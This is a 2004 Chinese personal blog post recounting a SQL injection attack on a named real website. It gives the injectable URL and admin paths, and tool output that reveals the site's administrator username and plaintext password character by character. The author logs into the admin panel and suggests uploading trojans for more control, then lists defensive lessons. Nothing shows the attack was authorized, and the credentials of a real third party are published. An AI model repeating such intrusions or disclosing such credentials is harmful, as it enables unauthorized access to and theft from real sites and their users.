头一低,很多年都这样过去了...

欢迎来到Kittow的部落格! - http://blog.skyhe.com

Agile Web Development (敏捷Web开发)

Want to Know Something More? Move Your Mouse Here;)

我是天空的一片云,偶尔投影在你的波心,你记得也好,最好你忘掉,你我在交汇时,互放的光亮。
——徐志摩《偶然》 More...

我的VOA听写积分

2004-4-7 [返回]
[原创]一次SQL注入破解实战记录
这几天为了毕业设计要做的学生处系统安全的问题在学习SQL注入
实际演练了一下(只为测试,请勿模仿或者用文中方法攻击破坏!)

第一,找目标,比如:
http://www.yldn.com/happy/

http://skyhe.com/down/pic/SQL_yldn1.jpg

首先,用ASC进行站点分析:

http://skyhe.com/down/pic/SQL_yldn6.jpg
获得可注入的链接
http://www.yldn.com/happy/sort.asp?classid=1

然后使用SQL注入工具进行注入、猜测、破解

http://skyhe.com/down/pic/SQL_yldn5.jpg
这里是破解过程和结果:
********************************************************
存在漏洞,以数值型方式注入开始!
可能存在   http://www.yldn.com/happy/admin
可能存在   http://www.yldn.com/happy/admin/index.asp
可能存在   http://www.yldn.com/happy/admin/manage.asp
可能存在   http://www.yldn.com/happy/../admin.asp
存在表   admin
存在账号字段   username
存在密码字段   password
用户名长度为   6位
密码长度为     8位
账号第1位是   z
账号第2位是   h
账号第3位是   p
账号第4位是   a
账号第5位是   y
账号第6位是   y
管理员名为   zhpayy
密码第1位是   6
密码第2位是   6
密码第3位是   3
密码第4位是   7
密码第5位是   1
密码第6位是   1
密码第7位是   4
密码第8位是   8
管理员密码为:66371148
所有检查完毕,请勿非法利用此结果信息!
*******************************************************

用http://www.yldn.com/happy/admin/index.asp登陆管理员入口:

http://skyhe.com/down/pic/SQL_yldn2.jpg
哦哦!进来了!~~~
嘿嘿,如果想拿到更大的权限可以上传些木马!
我在这里就不多说了!

http://skyhe.com/down/pic/SQL_yldn3.jpg

http://skyhe.com/down/pic/SQL_yldn4.jpg

kittow总结:
经过这次破解实战,我认识到网站安全要做到以下几点:
1、替换所有的返回参数、不论数值还是字符,杜绝SQL注入漏洞
2、管理员表一定不能用常见的admin之类
3、管理员密码一定要MD5加密,防止破解
4、数据库进行防下载处理
5、服务器端安全设置要充分,防止ASP木马等脚本木马的上传运行

又UP UP UP~~~!!!^0^
转自:天河网 | www.skyhe.com

Posted at 10:43 AM | Comments[0]

转自:天河网 | www.skyhe.com

发表评论
We Used Ajax to Post Your Comment!
本站评论系统采用Ajax技术,无刷新发送评论
您的大名 *   
电子邮件  
5+6=? *(请输入“5+6=?”的结果)
评论内容 *